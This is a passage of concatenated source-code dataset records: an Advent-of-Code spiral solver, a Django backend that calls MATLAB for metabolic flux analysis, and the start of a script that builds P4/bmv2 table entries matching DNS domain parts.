BluefinserialCommand(sirius_target, verbose=verbose)\n\t\tecdsa_sign_package = struct.pack(' inputNumber:\n #print(memoryList)\n flag = False\n break\n\n squareSize += 2\n\ndef getNodeTypeA(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx + 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeB(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - 2] + memoryList[idx - distToLeftNode] + memoryList[idx + 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeC(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - distToLeftNode - 1] + memoryList[idx - distToLeftNode] + memoryList[idx + 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeD(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - distToLeftNode - 1] + memoryList[idx - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeE(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef validateCurrentValue(cV, inputNr):\n if cV > inputNr:\n print(\"THE ANSWER IS: \" + str(cV))\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n main()\n","sub_path":"ac_task3_2.py","file_name":"ac_task3_2.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"328744771","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nimport logging\nimport matlab.engine\nimport os\nimport json\nfrom escher import Builder\n\n\n# Create your views here.\n# 实例化两个logger用于记录日志\ninfo_logger = logging.getLogger('info_logger') # 记录正确的信息\nerror_logger = logging.getLogger('error_logger') # 记录错误的信息\n\n# matlabscript的路径\nviews_path = os.path.abspath(__file__)\nbackend_path = os.path.dirname(views_path)\nmatlabscript_path = os.path.join(backend_path, 'matlabscript')\n\n\n# 一个测试日志和matlab的函数\ndef test_view_function(request):\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n print('进入到test函数中')\n request_json = json.loads(request.body)\n num1 = request_json['num1']\n num2 = request_json['num2']\n\n try:\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n result = eng.addFunction(num1, num2)\n print(result)\n return JsonResponse({'error_code': 0, 'result': result})\n except Exception as e:\n error_logger.info('error_message: ' + str(e))\n return JsonResponse({'error_code': -1, 'error_message': e})\n\n\n# 一个测试matlab返回结构体的函数\ndef test_struct_function(request):\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n try:\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n result = eng.testStruct()\n print(result['age'])\n print(result['weight'])\n print(result['name'])\n return JsonResponse({'result': result})\n except Exception as e:\n return JsonResponse({'msg': str(e)})\n\n\ndef cofactor_analysis(request):\n \"\"\"\n cofactorFlux\n :param request: headpath, username\n :return: 通过matlab保存文件\n \"\"\"\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n headpath = request_json['headpath']\n username = request_json['username']\n\n try:\n # 计算成功返回\"计算成功\"的信息\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n eng.mstpym(headpath, username, 'taskname', 'cofactorFlux')\n return JsonResponse({\n 'code': 200,\n 'msg': '计算成功'\n })\n except Exception as e:\n # 计算失败时返回报错信息\n print(e)\n error_logger.info('error_message: ' + str(e))\n return JsonResponse({\n 'code': 500,\n 'msg': str(e),\n })\n\n\ndef FBA_caculation(request):\n \"\"\"\n FluxBA\n :param request: headpath, username, FBA_kind\n :return:\n \"\"\"\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n headpath = request_json['headpath']\n username = request_json['username']\n FBA_kind = request_json['FBA_kind'] # 根据api中这个数是integer\n\n try:\n # 计算成功返回\"计算成功\"的信息\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n theoutput = eng.mstpym(headpath, username, 'taskname', 'FluxBA', 'fluxes_ind', FBA_kind)\n # print(theoutput)\n return JsonResponse({\n 'code': 200,\n 'data': {\n 'biomass': theoutput['biomass'],\n 'maxYield': theoutput['max_yield'],\n 'prodLb': theoutput['prod_lb'],\n 'prodUb': theoutput['prod_ub'],\n 'totalrxn': theoutput['totalrxn'],\n }\n })\n except Exception as e:\n print(str(e))\n error_logger.info('error_message: ' + str(e))\n return JsonResponse({\n 'code': 500,\n 'msg': str(e),\n })\n\n\ndef FVA_caculation(request):\n \"\"\"\n FluxVA 将一个名为currentFVA.txt文件保存在用户的fluxes文件夹\n :param request: headpath, username,\n :return:\n \"\"\"\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n headpath = request_json['headpath']\n username = request_json['username']\n\n try:\n # 计算成功返回\"计算成功\"的信息\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n eng.mstpym(headpath, username, 'taskname', 'FluxVA')\n return JsonResponse({'code': 200})\n except Exception as e:\n # 计算失败时返回报错信息\n print(str(e))\n error_logger.info('error_message: ' + str(e))\n return JsonResponse({\n 'code': 500,\n 'msg': str(e),\n })\n\n\ndef full_analysis(request):\n \"\"\"\n metFlux\n :param request:headpath, username, met\n :return:\n \"\"\"\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n headpath = request_json['headpath']\n username = request_json['username']\n met = request_json['met']\n\n try:\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n theoutput = eng.mstpym(headpath, username, 'taskname', 'metFlux', 'themet', met)\n # TODO: matlab-python 文档中写的theoutput的返回值也需要,但是py-java api中不需要把theoutput拆解开?\n return JsonResponse({\n 'code': 200,\n })\n except Exception as e:\n print(str(e))\n # 计算失败时返回报错信息\n error_logger.info('error_message' + str(e))\n return JsonResponse({\n 'code': 500,\n 'msg': str(e),\n })\n\n\ndef model_info(request):\n \"\"\"\n modelInfo\n :param request: headpath, username\n :return:\n \"\"\"\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n headpath = request_json['headpath']\n username = request_json['username']\n print(headpath, username)\n\n try:\n eng = matlab.engine.start_matlab()\n eng.addpath(matlabscript_path)\n theoutput = eng.mstpym(headpath, username, 'taskname', 'modelInfo')\n return JsonResponse({\n 'code': 200,\n 'data': {\n 'therxns': theoutput['therxns'],\n 'themets': theoutput['themets'],\n 'sub_str': theoutput['substr'],\n # 'prod': theoutput['prod'],\n 'biomass': theoutput['biomass'],\n }\n })\n except Exception as e:\n print(str(e))\n error_logger.info(str(e))\n return JsonResponse({\n 'code': 500,\n 'msg': str(e),\n })\n\n\ndef out_image(request):\n \"\"\"\n 生成母版图\n :param request:\n :return:\n \"\"\"\n log_message = request.path + \" \" + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n file_path = request_json['file_path']\n print(file_path)\n\n data = '' # 最终要返回的html代码\n try:\n # json_repr = 'iJO1366.Nucleotide-metabolism.json'\n json_repr = file_path\n builder = Builder(map_json=json_repr)\n builder.save_html('example_map.html')\n\n with open('example_map.html', 'r') as input_object:\n data = input_object.read()\n\n # 删去临时的example_map.html\n if os.path.exists('example_map.html'):\n os.remove('example_map.html')\n return JsonResponse({\n 'code': 200,\n 'data': data\n })\n except Exception as e:\n print(str(e))\n error_logger.info(str(e))\n return JsonResponse({\n 'code': 500,\n 'msg': str(e),\n })\n\n\ndef mat_info(request):\n \"\"\"\n 获取母版获得参照底物 目标产物 生物质反应 反应名 列表\n :param request:\n :return:\n \"\"\"\n log_message = request.path + ' ' + request.method\n info_logger.info(log_message)\n\n request_json = json.loads(request.body)\n headpath = request_json['headpath']\n username = request_json['username']\n matFileName = request_json['matFileName']\n pass\n\n\n\n\n\n\n","sub_path":"mst_py/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"449902151","text":"import json\n\nglobalID1T = 0\nglobalID2T = 0\nglobalID3T = 0\nglobalID4T = 0\nglobalID5T = 0\nglobalIDT = 0\npriority1T = 0\npriority2T = 0\npriority3T = 0\npriority4T = 0\npriority5T = 0\n\nglobalID1 = 0\nglobalID2 = 0\nglobalID3 = 0\nglobalID4 = 0\nglobalID5 = 0\nglobalID = 0\npriority1 = 0\npriority2 = 0\npriority3 = 0\npriority4 = 0\npriority5 = 0\n\ndata = {}\ndata[\"target\"] = \"bmv2\"\ndata[\"p4info\"] = \"build/calc2.p4.p4info.txt\"\ndata[\"bmv2_json\"] = \"build/calc2.json\"\ndata[\"table_entries\"] = []\n\ndef dictSetUpT(partNum):\n if (partNum == 1):\n partsDict = {\n \"headers.q1_1.char\": [0, 255],\n \"headers.q1_2.char\": [0, 255],\n \"headers.q1_3.char\": [0, 255],\n \"headers.q1_4.char\": [0, 255],\n \"headers.q1_5.char\": [0, 255],\n \"headers.q1_6.char\": [0, 255],\n \"headers.q1_7.char\": [0, 255],\n \"headers.q1_8.char\": [0, 255],\n \"headers.q1_9.char\": [0, 255],\n \"headers.q1_10.char\": [0, 255],\n \"headers.q1_11.char\": [0, 255],\n \"headers.q1_12.char\": [0, 255],\n \"headers.q1_13.char\": [0, 255],\n \"headers.q1_14.char\": [0, 255],\n \"headers.q1_15.char\": [0, 255],\n \"headers.q1_16.char\": [0, 255],\n \"headers.q1_17.char\": [0, 255],\n \"headers.q1_18.char\": [0, 255],\n \"headers.q1_19.char\": [0, 255],\n \"headers.q1_20.char\": [0, 255],\n \"headers.q1_21.char\": [0, 255],\n \"headers.q1_22.char\": [0, 255],\n \"headers.q1_23.char\": [0, 255],\n \"headers.q1_24.char\": [0, 255],\n \"headers.q1_25.char\": [0, 255],\n \"headers.q1_26.char\": [0, 255],\n \"headers.q1_27.char\": [0, 255],\n \"headers.q1_28.char\": [0, 255],\n \"headers.q1_29.char\": [0, 255],\n \"headers.q1_30.char\": [0, 255],\n \"headers.q1_31.char\": [0, 255],\n \"headers.q1_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 2):\n partsDict = {\n \"headers.q2_1.char\": [0, 255],\n \"headers.q2_2.char\": [0, 255],\n \"headers.q2_3.char\": [0, 255],\n \"headers.q2_4.char\": [0, 255],\n \"headers.q2_5.char\": [0, 255],\n \"headers.q2_6.char\": [0, 255],\n \"headers.q2_7.char\": [0, 255],\n \"headers.q2_8.char\": [0, 255],\n \"headers.q2_9.char\": [0, 255],\n \"headers.q2_10.char\": [0, 255],\n \"headers.q2_11.char\": [0, 255],\n \"headers.q2_12.char\": [0, 255],\n \"headers.q2_13.char\": [0, 255],\n \"headers.q2_14.char\": [0, 255],\n \"headers.q2_15.char\": [0, 255],\n \"headers.q2_16.char\": [0, 255],\n \"headers.q2_17.char\": [0, 255],\n \"headers.q2_18.char\": [0, 255],\n \"headers.q2_19.char\": [0, 255],\n \"headers.q2_20.char\": [0, 255],\n \"headers.q2_21.char\": [0, 255],\n \"headers.q2_22.char\": [0, 255],\n \"headers.q2_23.char\": [0, 255],\n \"headers.q2_24.char\": [0, 255],\n \"headers.q2_25.char\": [0, 255],\n \"headers.q2_26.char\": [0, 255],\n \"headers.q2_27.char\": [0, 255],\n \"headers.q2_28.char\": [0, 255],\n \"headers.q2_29.char\": [0, 255],\n \"headers.q2_30.char\": [0, 255],\n \"headers.q2_31.char\": [0, 255],\n \"headers.q2_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 3):\n partsDict = {\n \"headers.q3_1.char\": [0, 255],\n \"headers.q3_2.char\": [0, 255],\n \"headers.q3_3.char\": [0, 255],\n \"headers.q3_4.char\": [0, 255],\n \"headers.q3_5.char\": [0, 255],\n \"headers.q3_6.char\": [0, 255],\n \"headers.q3_7.char\": [0, 255],\n \"headers.q3_8.char\": [0, 255],\n \"headers.q3_9.char\": [0, 255],\n \"headers.q3_10.char\": [0, 255],\n \"headers.q3_11.char\": [0, 255],\n \"headers.q3_12.char\": [0, 255],\n \"headers.q3_13.char\": [0, 255],\n \"headers.q3_14.char\": [0, 255],\n \"headers.q3_15.char\": [0, 255],\n \"headers.q3_16.char\": [0, 255],\n \"headers.q3_17.char\": [0, 255],\n \"headers.q3_18.char\": [0, 255],\n \"headers.q3_19.char\": [0, 255],\n \"headers.q3_20.char\": [0, 255],\n \"headers.q3_21.char\": [0, 255],\n \"headers.q3_22.char\": [0, 255],\n \"headers.q3_23.char\": [0, 255],\n \"headers.q3_24.char\": [0, 255],\n \"headers.q3_25.char\": [0, 255],\n \"headers.q3_26.char\": [0, 255],\n \"headers.q3_27.char\": [0, 255],\n \"headers.q3_28.char\": [0, 255],\n \"headers.q3_29.char\": [0, 255],\n \"headers.q3_30.char\": [0, 255],\n \"headers.q3_31.char\": [0, 255],\n \"headers.q3_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 4):\n partsDict = {\n \"headers.q4_1.char\": [0, 255],\n \"headers.q4_2.char\": [0, 255],\n \"headers.q4_3.char\": [0, 255],\n \"headers.q4_4.char\": [0, 255],\n \"headers.q4_5.char\": [0, 255],\n \"headers.q4_6.char\": [0, 255],\n \"headers.q4_7.char\": [0, 255],\n \"headers.q4_8.char\": [0, 255],\n \"headers.q4_9.char\": [0, 255],\n \"headers.q4_10.char\": [0, 255],\n \"headers.q4_11.char\": [0, 255],\n \"headers.q4_12.char\": [0, 255],\n \"headers.q4_13.char\": [0, 255],\n \"headers.q4_14.char\": [0, 255],\n \"headers.q4_15.char\": [0, 255],\n \"headers.q4_17.char\": [0, 255],\n \"headers.q4_18.char\": [0, 255],\n \"headers.q4_19.char\": [0, 255],\n \"headers.q4_20.char\": [0, 255],\n \"headers.q4_21.char\": [0, 255],\n \"headers.q4_22.char\": [0, 255],\n \"headers.q4_23.char\": [0, 255],\n \"headers.q4_24.char\": [0, 255],\n \"headers.q4_25.char\": [0, 255],\n \"headers.q4_26.char\": [0, 255],\n \"headers.q4_27.char\": [0, 255],\n \"headers.q4_28.char\": [0, 255],\n \"headers.q4_29.char\": [0, 255],\n \"headers.q4_30.char\": [0, 255],\n \"headers.q4_31.char\": [0, 255],\n \"headers.q4_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 5):\n partsDict = {\n \"headers.q5_1.char\": [0, 255],\n \"headers.q5_2.char\": [0, 255],\n \"headers.q5_3.char\": [0, 255],\n \"headers.q5_4.char\": [0, 255],\n \"headers.q5_5.char\": [0, 255],\n \"headers.q5_6.char\": [0, 255],\n \"headers.q5_7.char\": [0, 255],\n \"headers.q5_8.char\": [0, 255],\n \"headers.q5_9.char\": [0, 255],\n \"headers.q5_10.char\": [0, 255],\n \"headers.q5_11.char\": [0, 255],\n \"headers.q5_12.char\": [0, 255],\n \"headers.q5_13.char\": [0, 255],\n \"headers.q5_14.char\": [0, 255],\n \"headers.q5_15.char\": [0, 255],\n \"headers.q5_17.char\": [0, 255],\n \"headers.q5_18.char\": [0, 255],\n \"headers.q5_19.char\": [0, 255],\n \"headers.q5_20.char\": [0, 255],\n \"headers.q5_21.char\": [0, 255],\n \"headers.q5_22.char\": [0, 255],\n \"headers.q5_23.char\": [0, 255],\n \"headers.q5_24.char\": [0, 255],\n \"headers.q5_25.char\": [0, 255],\n \"headers.q5_26.char\": [0, 255],\n \"headers.q5_27.char\": [0, 255],\n \"headers.q5_28.char\": [0, 255],\n \"headers.q5_29.char\": [0, 255],\n \"headers.q5_30.char\": [0, 255],\n \"headers.q5_31.char\": [0, 255],\n }\n return partsDict\n return -1\n\ndef addPart1ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q1_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q1_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q1_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q1_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q1_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q1_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q1_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q1_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q1_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q1_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q1_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q1_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q1_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q1_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q1_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q1_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q1_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q1_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q1_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q1_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q1_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q1_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q1_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q1_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q1_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q1_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q1_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q1_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q1_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q1_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q1_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q1_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart2ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q2_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q2_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q2_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q2_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q2_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q2_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q2_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q2_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q2_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q2_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q2_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q2_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q2_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q2_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q2_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q2_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q2_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q2_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q2_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q2_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q2_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q2_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q2_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q2_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q2_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q2_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q2_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q2_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q2_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q2_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q2_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q2_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart3ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q3_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q3_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q3_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q3_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q3_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q3_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q3_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q3_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q3_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q3_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q3_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q3_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q3_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q3_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q3_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q3_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q3_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q3_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q3_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q3_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q3_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q3_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q3_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q3_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q3_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q3_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q3_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q3_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q3_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q3_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q3_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q3_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart4ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q4_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q4_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q4_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q4_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q4_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q4_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q4_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q4_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q4_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q4_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q4_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q4_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q4_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q4_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q4_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q4_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q4_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q4_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q4_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q4_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q4_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q4_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q4_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q4_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q4_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q4_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q4_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q4_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q4_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q4_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q4_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q4_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart5ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 31):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q5_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q5_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q5_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q5_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q5_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q5_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q5_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q5_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q5_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q5_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q5_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q5_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q5_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q5_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q5_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q5_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q5_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q5_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q5_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q5_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q5_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q5_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q5_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q5_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q5_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q5_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q5_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q5_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q5_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q5_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q5_31.char\"] = [part[i], 255]\n return partsDict\n\npart5DictT = {}\npart4DictT = {}\npart3DictT = {}\npart2DictT = {}\npart1DictT = {}\n\n# If len(parts)==1\ndef onepartsT(parts):\n if parts[0] in part1DictT:\n return 